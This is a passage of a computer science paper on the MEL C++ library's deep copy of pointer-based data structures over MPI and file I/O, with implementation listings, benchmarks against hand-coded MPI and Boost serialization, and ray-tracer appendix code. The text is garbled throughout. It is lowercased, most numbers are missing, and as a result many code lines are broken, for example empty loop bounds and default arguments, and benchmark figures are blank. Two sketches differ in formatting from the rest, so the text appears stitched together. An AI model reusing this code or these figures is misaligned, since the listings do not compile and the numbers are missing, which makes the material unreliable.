dst, tag, comm); // ^ correct. uses internal member function of structc and the // external free function structa_deepcopy for structa. the option to use external deep copy functions gives our method flexibility when we need to add deep copy semantics to code that cannot be directly, or easily modified. however, this does not mean it will always be applicable as it requires intimate and low- level knowledge of the object’s internal implementation and methods of allocation. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mel implementation details in the following section we provide a detailed discussion of the implementation of the mel deep copy algorithm. 
detecting the deep copy function using template meta-programming to detect whether the type under consideration contains a deep copy function we make use of sfinae (substitution failure is not an error) to create a compile-time boolean test for the existence of a member function with the desired signature. we encapsulate the usage of this method into a templated shorthand that uses std::enable_if to give us a clean and concise method for providing function overloads for deep and non-deep types. listing , shows an implementation of the technique used to conditionally detect member functions of template types at compile time. the overloads of void somefunc (t &obj) for when t is or is not a type with a deep copy function allows us specialize our implementation for deep types while allowing them to share identical function signatures. listing mel implementation–detecting the deep copy function. template<typename t> struct hasdeepcopymethod { // this pseudo-type does not exist unless type u has a member // function of the desired form: // template<typename msg> void deepcopy(msg &msg) template<typename u, void(u::*)(mel::deep::message <notransport>&)> struct sfinae {}; // if this succeeds test<t> will be a function that returns char template<typename u> static char test(sfinae<u, &u::deepcopy>*); // otherwise test<t> will return an int template<typename u> static int test(...); // we can now test if type t has the desired member function by // seeing if the result is the size of a char or an int. static const bool value = sizeof(test<t>( )) == sizeof(char); }; // shorthands for when implementing functions template<typename t, typename r = void> using enable_if_deep = typename std::enable_if< hasdeepcopymethod<t>::value, r>::type; template<typename t, typename r = void> using enable_if_not_deep = typename std::enable_if <!(hasdeepcopymethod<t>::value), r>::type; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // example usage in function definitions template<typename t> enable_if_deep<t> somefunc(t &obj) { std::cout << "called with deep type!" << std::endl; } template<typename t> enable_if_not_deep<t> somefunc(t &obj) { std::cout << "called with non-deep type!" << std::endl; } // a deep type struct structa { template<typename msg> void deepcopy(msg &msg) {} }; structa sa; somefunc(sa); // called with deep type! int i; somefunc(i); // called with non-deep type! transport-api implementation next we describe the implementation of the transport api which specifies the traversal order our algorithm uses when performing deep copy. message::packvar the message::packvar function will call the deep copy function of the given variable to resolve its dependencies. this function works on the assumption that local member variables of the object have already been transported when the parent object was traversed. it is for this reason that message::packvar is only defined for deep types, as a non-deep type will have been transported automatically with the parent. in all of the following listings for the implementations of the transport api the overloads for non-deep types have been omitted for space. listing mel implementation–message::packvar. // transport a deep object template<typename d> inline enable_if_deep<d> message::packvar(d &obj) { // assumes that the footprint of obj has already been transported obj.deepcopy(*this); // *this == the message object } whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ message::packptr when transporting dynamically allocated memory special care must be taken to correctly allocate memory on the receiving processes. listing shows the implementation of message::packptr for deep types. this function offloads its work to the transportalloc helper function of the message object. on receiving process, transportalloc will make an allocation of len elements of the given type before receiving the data. on the sending process, transportalloc is identical to transport and simply moves the requested data. for a deep type, message::packptr will then loop over all the received elements and call their deep copy functions to resolve any dependencies. listing mel implementation–message::packptr. // transport a deep pointer to len objects template<typename d> inline enable_if_deep<d> message::packptr(d *&ptr, int len = ) { // on sender - if (len > ) and (ptr != nullptr) send the memory // // on receiver - if (len > ) and (ptr != nullptr) then overwrite // the dangling ptr with a new allocation of len elements and // receive the memory transportalloc(ptr, len); // followed by the recursion for deep types if (ptr != nullptr) { for (int i = ; i < len; ++i) ptr[i].deepcopy(*this); } } message::packsharedptr in complex structured data there is often a requirement for data to be self referencing. that is, one part of the deep structure may be pointed to from multiple other points within the structure. in these situations, a naı̈ve deep copy algorithm would traverse the shared object within the structure multiple times allocating a unique copy of it with each visit. if the shared object is deep itself and points to one of its ancestors within the structure, then the deep copy algorithm will become stuck in an infinite cycle within the data, allocating new memory with each loop. to avoid this and to allow complex self-referential data to be transported, we provide the message::packsharedptr function shown in listing . this method checks the given pointer against a hash-map of type (pointer / pointer) to determine if the pointed to memory has already been transported. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ listing mel implementation–message::packsharedptr. // transport a deep shared pointer to len objects template<typename d> inline enable_if_deep<d> message::packsharedptr(d *&ptr, int len = ) { // save the original pointer in case we modify it d *oldptr = ptr; // is the given pointer already in the hash-map? // if so, set ptr equal to the pointer stored in the hash-map and // return if (pointermap.find(oldptr, ptr)) return; // same as for packptr transportalloc(ptr, len); // insert the (newly allocated, on receiver) ptr into the hashmap // with the original dangling pointer (from the sender) as the key pointermap.insert(oldptr, ptr); // followed by the recursion for deep types if (ptr != nullptr) { for (int i = ; i < len; ++i) ptr[i].deepcopy(*this); } } during deep copy, the first time a shared pointer is passed to message:: packsharedptr on both the sending and receiving processes, it is transported in the same manner as in message::packptr by calling transportalloc. on the sending process, the pointer is then inserted into the hash-map so it can be ignored if it is visited again. 
on the receiving processes, the call to transportalloc will have caused the dangling pointer from the sender to have been overwritten with the newly allocated pointer. this new pointer is inserted into the hash-map with the original (dangling) pointer as the key, so that next time the receiver is asked to transport the same dangling pointer it can simply lookup and return the existing allocation. when a shared pointer that has already been visited is passed to message:: packsharedptr and it is found within the hash-map then sending process can simply return as no memory needs to be transported; the receiving process uses the dangling pointer passed to it to retrieve the valid pointer that was previously allocated and transported the last time the shared pointer was visited. all interaction with the hash-map is performed through the pointermap.find and pointermap.insert functions of the message object. these functions are further discussed in section hash-map implementation. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a nice property of this scheme is that the hash-map is never communicated and is constructed independently on both the sending and receiving processes. this means that for non-buffered communications the sender and receiver can traverse the structure in parallel (lock-step), and for buffered communications or buffered/non-buffered file- access the processes can traverse the structure independently. message::packstl as part of the transport api, we provide helper functions for moving common c++ stl containers. listing shows the implementation of message::packstl for c++ std:: vector’s of both deep and non-deep types. this is very similar to the implementation of message::packptr discussed previously with the slight difference that instead of making a new allocation on the receiving processes via transportalloc we instead repair the internal pointer of the given std::vector by calling the placement-new operator to recreate the vector in place (as discussed in listing ). the implementations of message:: packstl for other stl containers is conducted in the same way and is omitted here. listing mel implementation–message::packstl for std::vector. // transport a std::vector of deep types template<typename d> inline enable_if_deep<d> packstl(std::vector<d> &obj) { // std::vector::size() is safe to access even if the internal // pointer is invalid int len = obj.size(); // if this is a recieving process then we need to repair the // dangling internal pointer if (!transport_method::source) { // std::vector forces construction of elements new (&obj) std::vector<d>(len, d()); // we need to call the destructor explicitly in case any //resources were acquired upon default construction of each // element. for (int i = ; i < len; ++i) (&obj[i])->~d(); } d *p = &obj[ ]; if (len > ) transport(p, len); // followed by the recursion for deep types for (int i = ; i < len; ++i) { obj[i].deepcopy(*this); } } whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ message::packrootvar, message::packrootptr, & message::packrootstl finally, we provide a set of functions to simplify the implementation of the top- level interface. recall that message::packvar is only defined for deep types and assumes that the object’s footprint is always transported with the parent object. 
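for completeness, the following is a hedged sketch of how the omitted std::list variant might look. it assumes, as in the std::vector case above, that the container's stored size is still readable from the copied footprint, and since list nodes are not contiguous it transports each element individually; the actual mel implementation may differ.

// hedged sketch - not the actual mel code for std::list
template<typename d>
inline enable_if_deep<d> packstl(std::list<d> &obj) {
    // assumes the size member copied with the parent footprint is usable
    int len = obj.size();

    if (!transport_method::source) {
        // rebuild the list in place so its internal node pointers are valid
        new (&obj) std::list<d>(len, d());
        // destroy the default-constructed elements before their footprints
        // are overwritten, as in the std::vector variant
        for (auto &elem : obj) (&elem)->~d();
    }

    // list nodes are not contiguous, so transport each element's footprint
    // individually, then recurse on its deep members
    for (auto &elem : obj) {
        d *p = &elem;
        transport(p, 1);
        elem.deepcopy(*this);
    }
}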
this is not the case for the top-level functions as no parent has been transported; in this case we must explicitly transport the object footprint regardless of whether it is deep or not. a similar scenario occurs for pointers passed to the top-level interface. in order to avoid duplicating all of the top-level functions to account for whether the root pointer is shared we always insert it into the hash-map as this is a small constant overhead that does not affect performance. recall from the implementation of message::packsharedptr that on the receiving processes the dangling pointer from the sender is used as the key into the hash-map. because of this, for the root pointer we must explicitly transport the address-value of the pointer from the sender to the receiving processes so they can insert it into their hash-maps. finally, when considering stl containers passed to the top-level interface, receiving processes cannot query .size() of the container as its footprint was not previously transported. instead, we explicitly transport the size of the container and call .resize() on the receiving processes. listing mel implementation–message::packrootvar, message::packrootptr, & message:: packrootstl. // transport the footprint of a non-deep object template<typename t> inline enable_if_not_deep<t> message::packrootvar(t &obj) { transport(obj); // transport the footprint } // transport the footprint of a deep object and call its // deepcopy function template<typename d> inline enable_if_deep<d> message::packrootvar(d &obj) { transport(obj); // transport the footprint obj.deepcopy(*this); // recurse on the deep structure } // transport a root pointer to len deep objects template<typename d> inline enable_if_deep<d> message::packrootptr(d *&ptr, int len = ) { // explicitly transport the pointer value for the root node // so the it can be hashed correctly on recieving processes whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ size_t addr = (size_t) ptr; transport(addr); ptr = (d*) addr; // same as packsharedptr, except we don't need to check the pointer d *oldptr = ptr; transportalloc(ptr, len); pointermap.insert(oldptr, ptr); // followed by the recursion for deep types if (ptr != nullptr) { for (int i = ; i < len; ++i) ptr[i].deepcopy(*this); } } // transport a root stl container to len deep objects template<typename d> inline enable_if_deep<d> packrootstl(std::vector<d> &obj) { // explicitly transport the length of the container int len; if (transport_method::source) { len = obj.size(); transport(len); } else { transport(len); obj.resize(len, d()); for (int i = ; i < len; ++i) (&obj[i])->~d(); } d *p = &obj[ ]; if (len > ) transport(p, len); // followed by the recursion for deep types for (int i = ; i < len; ++i) { obj[i].deepcopy(*this); } } transport method implementation & usage a transport method is a class which provides a single public-member function of the form template<typename t> inline void transport(t *&ptr, const int len) which defines how to move len objects of type t from a given pointer ptr. listing shows the implementation of the transportsend transport method, which defines whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ how to move data using a discrete mpi_send for each transport. an instance of a transport method carries any state needed to represent the data movement over the duration of the deep copy. 
in the case of transportsend the state needed to represent the transfer are the mpi rank of the destination process, a tag to use for the communication, and the mpi communicator over which the data will be transferred. for other transport methods the state may be a file handle, or a pointer to an array used for buffering. listing mel implementation–transport method for message. class transportsend { private: // members - store any state or resources needed to maintain // this transport method const int pid, tag; const mel::comm comm; public: // a transport method is either a source or a destination // this is known at compile time static constexpr bool source = true; transportsend(const int _pid, const int _tag, const mel::comm &_comm) : pid(_pid), tag(_tag), comm(_comm) {} // transport function describes how to move data, in this case by // performing an mpi_send template<typename t> inline void transport(t *&ptr, const int len) { mel::send(ptr, len, pid, tag, comm); } }; listing shows the implementation of one of the top-level interface functions for performing deep copy as an mpi_send operation. a message<transportsend> object is instantiated, and the parameters from the function are transparently forwarded to the instance of the transport method within the message object using std::forward<args>(args). after creating the message object the pointer to the deep structure can be transported by calling message::packrootptr from the transport api. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ listing mel implementation–usage of a transport method in the top-level interface. template<typename p, typename hash_map = mel::deep::pointerhashmap> inline enable_if_pointer<p> send(p &ptr, const int dst, const int tag, const comm &comm) { // arguments to the message constructor are std::forward'd to the // transportsend constructor message<transportsend, hash_map> msg(dst, tag, comm); // transport the deep-structure msg.packrootptr(ptr); } when performing a buffered deep copy the data is first packed into a contiguous buffer on the sending process before being transported as a single operation to the receiving processes where the data can then be expanded back into the deep structure. listing shows the implementation of bufferedsend and bufferedrecv which make use of the transportbufferwrite and transportbufferread transport methods. listing mel implementation–usage of a buffered transport method in the top-level interface. template<typename p, typename hash_map = mel::deep::pointerhashmap> inline enable_if_pointer<p> bufferedsend(p &ptr, const int dst, const int tag, const comm &comm) { // compute the buffer size for the deep structure and transport it mel::deep::bufferedsend(ptr, dst, tag, comm, mel::deep:: buffersize(ptr)); } template<typename p, typename hash_map = mel::deep::pointerhashmap> inline enable_if_pointer<p> bufferedsend(p &ptr, const int dst, const int tag, const comm &comm, const int buffersize) { // allocate the buffer for packing char *buffer = mel::memalloc<char>(buffersize); // deep-copy into the buffer message<transportbufferwrite,hash_map>msg(buffer,buffersize); msg.packrootptr(ptr); // send the buffer in one message. uses message<transportsend> whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ // buffersize represents an upperbound on how much data there // is to transport, // msg.getoffset() gives us how much data was actually packed into // the buffer mel::deep::send(buffer, msg.getoffset(), dst, tag, comm); // clean up the buffer mel::memfree(buffer); } template<typename p, typename hash_map = mel::deep::pointerhashmap> inline enable_if_pointer<p> bufferedrecv(p &ptr, const int src, const int tag, const comm &comm) { // recieve the packed buffer in one message. uses // message<transportrecv> int buffersize; char *buffer = nullptr; mel::deep::recv(buffer, buffersize, src, tag, comm); // buffersize onthereceivingprocessesisequaltomsg.getoffset() // on the sending process // deep-copy out of the buffer message<transportbufferread, hash_map> msg(buffer, buffersize); msg.packrootptr(ptr); // clean up the buffer mel::memfree(buffer); } the last parameter to buffered transport methods on sending processes is an integer value representing the byte size of the contiguous buffer to use for packing the deep structure. if this value is omitted an overloaded version of the function computes the upper-bound of the buffer size needed by calling mel::deep::buffersize before forwarding its parameters to the main function overload. note that on the sending process for a buffered transport that msg.getoffset() is used as the length parameter when transporting the buffer (listing , line ) and not the buffersize parameter. this means that if the sender blindly requests a large buffer because it does not know the size of the deep structure exactly, but only a part of the buffer is filled, only the used part of the buffer will be transported to the receiving processes. in the scenario where the buffer size given was not large enough to complete the deep copy, a run-time assertion occurs. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hash-map implementation the message object is templated on a hash-map type that exposes public-member functions of the form: template<typename t> inline bool find(t* oldptr, t* &ptr) template<typename t> inline void insert(t* oldptr, t* ptr) this allows the user to provide an implementation of a hashing scheme optimized for pointers or to provide an adapter to a third-party hash-map implementation. one of the goals of mel is to be portable and to not introduce external dependencies on the users code; because of this, our default hash-map implementation (listing ) is simply a wrapper around a std::unordered_map container between two void pointers. listing mel implementation–default hash-map interface for mel::deep::message. class pointerhashmap { private: // hashmaps for storing pointers to types of any size std::unordered_map<void*, void*> pointermap; public: // pointer hashmap public interface // returns true if oldptr is found in the hash-map and sets ptr // equal to the stored value // otherwise returns false and ptr is unaltered template<typename t> inline bool find(t* oldptr, t* &ptr) { // is oldptr already in the hashmap? const auto it = pointermap.find((void*) oldptr); if (it != pointermap.end()) { // if so set ptr equal to the value stored in the hashmap ptr = (t*) it->second; return true; } return false; } // insert ptr into the hashmap using oldptr as the key template<typename t> inline void insert(t* oldptr, t* ptr) { pointermap.insert(std::make_pair((void*)oldptr,(void*)ptr)); } }; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. 
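to make the pluggable hash-map policy concrete, the following sketch shows one possible alternative that satisfies the same find/insert interface without hashing, by keeping the (sender address, local address) pairs in a std::vector sorted by key and using binary search. this is our own illustration rather than code shipped with mel; the class name flatpointermap and the choice of a sorted vector are assumptions made purely for the example.

#include <vector>
#include <utility>
#include <algorithm>
#include <functional>

// a minimal sketch of an alternative hash-map policy for mel::deep::message;
// it stores key/value pairs sorted by key so lookups can use binary search
class flatpointermap {
private:
    std::vector<std::pair<void*, void*>> entries;

    // locate the first entry whose key is not less than the given key
    inline std::vector<std::pair<void*, void*>>::iterator lowerbound(void *key) {
        return std::lower_bound(entries.begin(), entries.end(), key,
            [](const std::pair<void*, void*> &entry, void *k) {
                return std::less<void*>()(entry.first, k);
            });
    }

public:
    // returns true and sets ptr to the stored value if oldptr was seen before;
    // otherwise returns false and leaves ptr unaltered
    template<typename t>
    inline bool find(t* oldptr, t* &ptr) {
        const auto it = lowerbound((void*) oldptr);
        if (it != entries.end() && it->first == (void*) oldptr) {
            ptr = (t*) it->second;
            return true;
        }
        return false;
    }

    // insert ptr into the map using oldptr (the sender's address) as the key,
    // preserving the sorted order
    template<typename t>
    inline void insert(t* oldptr, t* ptr) {
        entries.insert(lowerbound((void*) oldptr),
                       std::make_pair((void*) oldptr, (void*) ptr));
    }
};

assuming the top-level templates shown earlier, such a type would be supplied through the hash_map template parameter, e.g. mel::deep::send<scene*, flatpointermap>(scene, dst, tag, comm), without any change to the user's deepcopy functions.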
/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ benchmarks for benchmarking we used the swansea branch of the hpc wales compute cluster. nodes contain two intel xeon e - processors for a total of physical cores with gb’s of ram per-node, connected with infiniband gbps networking. benchmarks were run using intel mpi . and compiling under intel icpc . . . case study: ray-tracing scene structure to evaluate the performance of our algorithms relative to the equivalent hand coded mpi implementations and to other libraries that offer deep copy semantics such as boost serialization library (cogswell, ), we used the example of deep copying a large binary-tree structure between processes in the context of a distributed ray-tracer. a d scene (fig. ) is loaded on one process, consisting of triangular meshes, cameras, materials, and a bounding volume hierarchy to help accelerate ray-triangle intersection tests. for each experiment, a scene was loaded containing increasing numbers of the classic utah teapot mesh. the scene structure was then communicated using the various algorithms and the performance measured by comparing the times spent between mpi_barrier’s before and after the communication. broadcast–mpi vs. mel for this example, just lines of code calling the transport api were added to the bvh treenode and scene structs (see appendix scene object containing mel deep copy methods) to enable both buffered and non-buffered deep copy using our algorithm. by comparison, the hand coded mpi non-buffered (see appendix hand coded non- buffered bcast of scene object) method took lines of code, and lines of code for the mpi buffered (see appendix hand coded buffered bcast of scene object) algorithm (not including comments, formatting, or trailing brackets), where pointers, allocations, and object construction had to be managed manually by the programmer. also, these implementations only handled the case of bcast operations, while the mel version works transparently with all operations. despite its generic interface and minimal syntax, our algorithm performs almost identically with hand coded mpi implementations in fewer lines of code and a fraction of the code complexity. relevant code for this example is given in appendix experiment : broadcasting a large tree structure. figure a shows the resulting times from broadcasting increasingly larger scenes with each algorithm, between nodes on hpc wales. we can see that the buffered methods that only send a small constant number of messages between processes are faster than non-buffered methods despite the added overheads from packing and unpacking the data. the scalability of our algorithm with respect to the number of mpi processes involved in the communication is only bounded by the scalability of the transport method itself. in the case of a broadcast operation, fig. b shows that varying the number whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ processes is of the same complexity as the underlying mpi_bcast communication (logarithmic). file write/read–mel vs. boost when fault tolerance is a concern one method for recovering from a failed process is to periodically cache the current state of what is being worked on to disk so that in the event of a failure the data can be reloaded on a new process (potentially on a different node) and the work continued from the point at which it was last saved. 
when the data needed to store the state of a process is deep we incur the same problems that arise during deep copy. mel implements file read and write operations for both buffered and non- buffered file access, utilizing the same user defined deep copy functions needed for the broadcast, send, and receive methods. for this experiment we also compared our performance to the boost serialization library which is designed for saving and restoring structured data from file. figure shows the results of using mel to write/read a large tree structure to or from file. unlike with mpi communications where mel’s buffered methods performed considerably faster than non-buffered variants due to the overheads from starting and ending network communications; with file access non-buffered reads perform almost identically to buffered methods. this is due to std::fstream’s use of an internal buffer to optimize file access, meaning that cost of starting and ending write/read operations is negligible compared to the cost of traversing the deep structure. while boost serialize also uses c++ streams their method of traversing the deep structure incurs significant overheads leading to poor and differing performance when reading and writing data. finally, non-buffered writes perform slightly poorer then buffered writes due to file system having to allocate additional blocks as the file grows. figure utah teapot mesh used for benchmarks. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ case study: graphs with cycles in the previous example the implementation of treenode was simplified by the observation that tree nodes were only pointed to from a single parent. however, in many applications multiple objects may share a common child. to show how mel copes with structures containing pointers to shared dependents we used the example of communicating generic directed graph structures constructed in various connectivities (see fig. a– d). relevant code for this example can be found in appendix experiment : communicating generic directed graph structures. fully connected graphs figure shows the results for communicating fully connected graph structures of increasing size in terms of broadcast (fig. a) and writing a checkpoint to file (fig. b). number of teapots ( triangles each) t im e ( s e co n d s) ray tracing scene object single node file-io to local ssd mel write mel buffered write mel read mel buffered read boost write boost read figure time comparison of mel to boost serialization library for file read/write on a single node, to a within node solid state drive. a b figure time comparison of algorithms broadcasting large tree structures between processes within node and on separate nodes. mel requires the addition of four simple lines of code which greatly accelerate programming time and vastly reduces the chance of user induced bugs. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in this example, n independent graph nodes will be traversed, each containing a list of pointers to all n nodes; during deep copy the hash-map will be queried n times and will grow to contain n entries. compared to the previous broadcast example for the ray tracing case study (section broadcast–mpi vs. mel) where buffered communication showed better performance, with fully connected graphs we see the opposite effect. 
non-buffered communication is consistently faster when the number of shared dependents is high. internally, shared pointers are tracked using a hash table to ensure that only distinct pointers are transported and duplicates linked correctly. because of the overheads attached to insert and find operations on the hash table, when the number of shared dependents is high the overhead from sending separate communications for each object in the structure is small compared to that of accessing the hash table. this has the effect of making the overhead from buffering the structure into a contiguous array for transport a bottleneck for deep copy. a similar trend is observed for file access, where non-buffered access is more efficient than buffered. in this example we also compare mel to boost serialization library. here shared pointer usage introduces significant overheads for boost that our method avoids leading to significantly improved performance. figure graph connectivities for { , , , , , : : : } nodes. a b figure time comparison for broadcast and file-io operations on fully connected graph structures. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ random graph next we look at graphs with random connectivities. figure shows the results of communicating randomly generated graphs of different sizes for broadcasting (fig. a) and writing a checkpoint to file (fig. b). with this example, n independent graph nodes will be traversed, each containing a list of pointers to a random number of nodes (at least one); during deep copy the hash-map will be queried between n and n times and will grow to contain n entries. again, we see that when the number of shared dependents within the structure is large non-buffered communication performs consistently better than for buffered. we also see slightly better performance than with the fully connected graphs, showing that time complexity scales linearly with the number of graph edges. for file access the same trends emerge, where our method performs considerably faster than boost serialization. ring graph a ring graph can be modeled a doubly-linked list where the last element is connected back to the first element in the structure. for this example, n independent graph nodes will be traversed, each containing a list of two pointers to previous and next nodes; during deep copy the hash-map will be queried n times and will grow to contain n entries. figure shows the results of communicating large ring structures for broadcasting (fig. a) and writing a checkpoint to file (fig. b). because the number of shared edges is small we initially see that buffered communication is faster than non-buffered as with section broadcast–mpi vs. mel. as the number of graph nodes in the structure passes , , the amount of time needed to buffer the structure becomes larger than the overhead associated with starting and stopping separate mpi communications making non-buffered method more efficient for larger structures. for file access, we still see that our methods perform consistently faster than boost’s even when the number of shared dependents is low. binary tree finally, we look at the example of constructing a binary tree shaped graph where there are no shared dependents. the generic container does not know this, and still must use a b figure time comparison for broadcast and file-io operations on randomly connected graph structures. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ message::packsharedptr to transport child nodes, meaning it still incurs overheads of pointer lookup. in this example, n independent graph nodes will be traversed, each containing a list of one or two pointers to descending child nodes; during deep copy the hash-map will be queried n times and will grow to contain n entries. figure shows the results of communicating binary trees of different sizes in terms of broadcast (fig. a) and writing a checkpoint to file (fig. b). similarly to communicating ring graphs, buffered network communication is significantly faster non-buffered methods until the structure becomes large enough that buffering becomes the main bottleneck. for file access the opposite is true, with non-buffered file access being slightly faster than buffered. we attribute this to std::fstream’s use of internal buffering, which renders the overheads from our fully buffered method unnecessary in this use case. conclusions and future work in this paper we have presented our implementation of deep copy semantics that encapsulates both buffered and non-buffered methods for dealing with complex structured data in the context of mpi inter-process communication and file access. users may choose shared versions for when data structures contain cycles or faster non-shared variants for when they do not. we have shown that a generic implementation of such semantics can achieve like for like performance with hand crafted implementations while a b figure time comparison for broadcast and file-io operations on ring graph structures. a b figure time comparison for broadcast and file-io operations on binary tree graph structures. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dramatically reducing code complexity and decreasing the chance for programmer error. we also demonstrate the method to be faster than utilizing boost serialization library. mel non-buffered methods provide a generic, low memory overhead, high performance (equal to hand crafted) solution to the deep copy problem. in the future we intend to include the implementation of a non-blocking top-level interface for asynchronous deep copy, additional transport methods for communicating deep structured data to cuda and opencl based accelerators, and a hash-map implementation highly optimized for pointers. the algorithms discussed in this paper are implemented as part of the mel, which is currently in development with the goal of creating a light weight, header only c++ wrapper around the c-style functions exposed by the mpi- standard, with backwards compatibility for systems where only mpi- is available. we plan to keep mel in active development and hope that the research community will join us as we continue to grow the features and capabilities encompassed within the project. mel is open-source and available on github under the mit license at: https://github. com/cs-swansea/mel. appendices experiment : broadcasting a large tree structure full code for this example is available at https://github.com/cs-swansea/mel/ under example-code/raytracingdeepcopy.cpp. listing deep copy of ray tracing scene object. 
//-----------------------------------------------------------// // example usage: // // mpirun -n [number of processes] ./raytracingdeepcopy [mesh path] [method index] // // mpirun -n ./raytracingdeepcopy "teapot.obj" // //-----------------------------------------------------------// int main(int argc, char *argv[]) { mel::init(argc, argv); // setup // who are we? mel::comm comm = mel::comm::world; const int rank = mel::commrank(comm), size = mel::commsize(comm); // check param count if (argc != ) { if (rank == ) std::cout << "wrong number of parameters..."<< std::endl; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/cs-swansea/mel https://github.com/cs-swansea/mel https://github.com/cs-swansea/mel/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mel::exit(- ); // ^^ equivalent of calling mpi_finalize() followed by // std::exit(- ) } // which model should we load and which algorithm should we use? const std::string meshpath = std::string(argv[ ]); const int method = std::stoi(argv[ ]); // load the scene on the root process scene *scene = nullptr; if (rank == ) { std::cout << "loading scene..." << std::endl; scene = loadscene(meshpath); } mel::barrier(comm); auto starttime = mel::wtime();// start the clock! // broadcast the scene structure with the selected method switch (method) { case : mel::deep::bcast(scene, , comm); // call mel::deep method. break; case : mel::deep::bufferedbcast(scene, , comm); // call mel::deep method. break; case : mpi_nonbufferedbcast_scene(scene, , (mpi_comm) comm); // hand written below break; case : mpi_bufferedbcast_scene(scene, , (mpi_comm) comm); // hand written below break; default: if (rank == ) std::cout << "invalid method index..." << std:: endl; mel::exit(- ); } mel::barrier(comm); whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ auto endtime = mel::wtime(); // stop the clock! if (rank == ) { std::cout << "broadcast scene in " << (endtime - starttime) << " seconds..." << std::endl; } // all processes now have a scene pointer that points to an // equivalent data-structure //-------------------------------------------------------// // now we can do some ray-tracing using the scene object! // //-------------------------------------------------------// // clean up mel::memdestruct(scene); // ^^ equivalent to explicitly calling the destructor followed by // mpi_free_mem. // scene->~scene(); // mpi_free_mem(scene); mel::finalize(); // tear down return ; } scene object containing mel deep copy methods listing ray tracing scene object. //--------------------------------------------// // structure representing a node in the bvh tree // //-------------------------------------------// struct treenode { int startelem, endelem; // start and end indices into vector of triangles vec v , v ; // vec is non-deep struct treenode *leftchild, *rightchild; // treenode is deep struct treenode() : treenode( , ) {} treenode(const int _s, const int _e) : startelem(_s), endelem(_e), leftchild(nullptr), rightchild(nullptr), whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ v { inf, inf, inf }, v { -inf, -inf, -inf } {} // ensure treenode can't be used incorrectly treenode(const treenode &old) = delete; // remove copyconstructor inline treenode& operator=(const treenode &old) = delete; // remove copyassignment treenode(treenode &&old) = delete; // remove moveconstructor inline treenode& operator=(treenode &&old) = delete; // remove moveassignment ∼treenode() { mel::memdestruct( leftchild); mel::memdestruct(rightchild); } // implementation of ray-treenode (ray-aabb) intersection // omitted for this example bool intersect(const ray &rayinv, double &tmin, const double dist) const; template<typename msg> inline void deepcopy(msg &msg) { msg.packptr( leftchild); msg.packptr(rightchild); } }; //---------------------------------------------------// // structure representing a scene object to be rendered // //---------------------------------------------------// struct scene { camera camera; // camera is non-deep struct std::vector<material> materials; // material is non-deep struct std::vector<triangle> mesh; // triangle is non-deep struct treenode *rootnode; // treenode is deep struct scene() : rootnode(nullptr) {} whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // ensure scene can't be used incorrectly scene(const scene &old) = delete; // remove copyconstructor inline scene& operator=(const scene &old) = delete; // remove copyassignment // move constructor scene(scene &&old) : mesh(std::move(old.mesh)), materials (std::move(old.materials)), camera(old.camera),rootnode(old.rootnode){ old.mesh.clear(); old.materials.clear(); old.rootnode = nullptr; } // move assignment operator inline scene& operator=(scene &&old) { mesh = std::move(old.mesh); materials = std::move(old.materials); rootnode = old.rootnode; camera = old.camera; old.mesh.clear(); old.materials.clear(); old.rootnode = nullptr; return *this; } ∼scene() { mel::memdestruct(rootnode); } // implementation of ray-scene intersection omitted for this example bool intersect(const ray &ray, intersection &isect) const; template<typename msg> inline void deepcopy(msg &msg) { msg & mesh & materials; msg.packptr(rootnode); } }; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hand coded non-buffered bcast of scene object listing hand coded non-buffered bcast of ray tracing scene object. inline void mpi_nonbufferedbcast_scene(scene *&scene, const int root, const mpi_comm comm) { int rank; mpi_comm_rank(comm, &rank); // receiving nodes allocate space for scene if (rank != root) { mpi_alloc_mem(sizeof(scene), mpi_info_null, &scene); new (scene) scene(); } // bcast the camera struct mpi_bcast(&(scene->camera), sizeof(camera), 